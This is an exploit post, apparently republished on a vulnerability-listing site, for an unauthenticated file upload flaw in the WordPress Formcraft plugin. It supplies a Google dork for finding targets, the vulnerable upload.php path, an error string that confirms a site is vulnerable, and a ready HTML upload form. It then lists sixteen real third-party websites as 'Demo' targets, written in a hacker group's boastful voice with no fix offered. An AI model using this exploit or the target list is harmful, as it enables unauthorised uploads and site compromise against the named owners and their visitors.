Wordpress Formcraft Plugin File Upload Vulnerability

2016.02.15
Credit: Hacker Khan
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Exploit Title: Wordpress Formcraft Plugin File Upload Vulnerability [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Google Dork: intext:"powered by formcraft", inurl:plugins/formcraft [+] Exploit Author: Iranian Anonymous [+] Vendor Homepage: [https://wordpress.org/plugins/formcraft-form-builder/] [+] Software Link: [-] [+] Version: [All Version] [+] Tested on: [Windows_Google Chrome & Mozila] [+] CVE : [-] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] DISCRIPTION: Hello Guys.The vulnerability of the type of uploading files.With This Exploit You Can Upload Your Files [+] --> [+] Exploit:Exploit:[SITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] If you have received this error [+] --> [{"failed":"No file found 2"}] [+] This means that Your Target Has This Vulnerability. [+] Script file Upload ==> [+] [<title>iranonymous_InfernaL</title> [+] <text>CW Wordpress Exploit</text> [+] <form method="POST" action=" [+] [Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] " enctype="multipart/form-data"> [+] <input type="file" name="files[]" /><button> iranonymous Arama</button> [+] </form>] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Demo: [+] http://tender-lite.ru/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://die-ruerup-rente.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://murrysvillepolice.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://vtra.ca/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://www.kyfame.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://krsdtrust.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://artbraaustin.org/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://jets-inc.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://boat-sites.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://dj4torontowedding.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://arunnerscircle.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://neonheadquarters.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://murrysville.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://comicconatsea.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://queensaccounting.ca/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+] http://morenoroofing.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Thanks to : MR.Khatar || KHAN || ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D [+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier And All Of Iranian Anonymous [+] We Are Iranian Anonymous Iranonymous.org [+] Discovered By: Hacker Khan [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top